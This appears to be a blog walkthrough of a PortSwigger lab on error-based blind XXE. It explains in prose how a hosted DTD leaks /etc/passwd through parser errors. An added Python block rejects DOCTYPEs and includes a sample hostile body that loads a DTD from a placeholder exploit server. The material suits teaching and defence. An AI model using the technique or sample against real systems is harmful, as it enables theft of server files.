Solving Portswigger Academy: Exploiting blind XXE to retrieve data via error messages

Vishal
2 min read · Sep 25, 2024

This lab has a “Check stock” feature that parses XML input but does not display the result.

To solve the lab, use an external DTD to trigger an error message that displays the contents of the /etc/passwd file.

The lab contains a link to an exploit server on a different domain where you can host your malicious DTD.

This is similar to the previous lab, but here we need to retrieve the information through the parser's error messages.

As usual, visit the lab, view the details of any product and use the Check stock option. Send this request to Repeater.

Original Request and Response

Now host an external DTD file on the exploit server. The DTD works as follows:

  1. An XML parameter entity named file is defined that refers to /etc/passwd, and a second parameter entity named eval is defined whose value is a dynamic declaration of a third parameter entity named error. When evaluated, error attempts to load a nonexistent file whose name incorporates the contents of the file entity.
  2. The eval entity is invoked, which causes the error entity to be declared.
  3. The error entity is then invoked, which attempts to load the nonexistent file and produces an error message that includes the contents of /etc/passwd as part of the file name.

Now, in Repeater, replace the whole XML body of the request with the payload below.

final payload

When you send the request, the response contains an XML parser error, and the contents of the /etc/passwd file are embedded in that error message.
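The leak works because the application accepts a DOCTYPE it never needs and then echoes the parser's own error text. As an added example (not code from the lab or this post), here is a stock-check handler that refuses any DOCTYPE before expat reads the DTD and returns a generic verdict instead of the parser message; the element names, sample bodies and exploit-server host are assumed.

```python
"""Refuse any DOCTYPE before the stock-check XML is parsed.

Added example, not code from the lab or the original post. The endpoint only
needs <productId> and <storeId> (assumed names), so a DOCTYPE, whether an external
subset pointing at a hosted DTD or an internal subset declaring parameter
entities (% file, % eval, % error), is rejected before expat processes it.
"""
import xml.parsers.expat

# Constructed sample bodies; the exploit-server host is a placeholder.
BENIGN = b'<?xml version="1.0"?><stockCheck><productId>1</productId><storeId>2</storeId></stockCheck>'
HOSTILE = (b'<?xml version="1.0"?><!DOCTYPE foo SYSTEM "http://EXPLOIT-SERVER-PLACEHOLDER/evil.dtd">'
           b'<stockCheck><productId>1</productId><storeId>2</storeId></stockCheck>')


class DoctypeNotAllowed(Exception):
    """Raised from the expat callback as soon as a DOCTYPE is seen."""


def _reject_doctype(name, sysid, pubid, has_internal_subset):
    # Runs before any entity in the DTD is declared or fetched, so neither the
    # hosted DTD nor a file:// entity is ever resolved.
    detail = f"DOCTYPE {name!r}"
    if sysid:
        detail += f" with external subset {sysid!r}"
    if has_internal_subset:
        detail += " with internal subset"
    raise DoctypeNotAllowed(detail)


def check_stock_request(data: bytes) -> dict:
    """Return {'ok': True, 'productId', 'storeId'} or {'ok': False, 'reason'}.

    The reason is for the server log; the client should get a generic 400,
    never the parser's message (that message is what this lab exfiltrates through).
    """
    fields, stack = {}, []
    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = _reject_doctype
    # Defence in depth should a DOCTYPE ever get through: never expand
    # parameter entities, and abort on any external entity reference.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.ExternalEntityRefHandler = lambda *_: 0  # 0 makes expat abort the parse
    parser.StartElementHandler = lambda name, attrs: stack.append(name)
    parser.EndElementHandler = lambda name: stack.pop()

    def chars(text):  # text may arrive in chunks; accumulate per element
        if stack and stack[-1] in ("productId", "storeId"):
            fields[stack[-1]] = fields.get(stack[-1], "") + text.strip()

    parser.CharacterDataHandler = chars
    try:
        parser.Parse(data, True)
    except DoctypeNotAllowed as exc:
        return {"ok": False, "reason": str(exc)}
    except xml.parsers.expat.ExpatError as exc:
        return {"ok": False, "reason": f"malformed XML: {exc}"}
    return {"ok": True, **fields}
```

Pair the DOCTYPE rejection with a generic error response; the lab is only solvable because the raw parser error, file name included, is reflected to the client.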
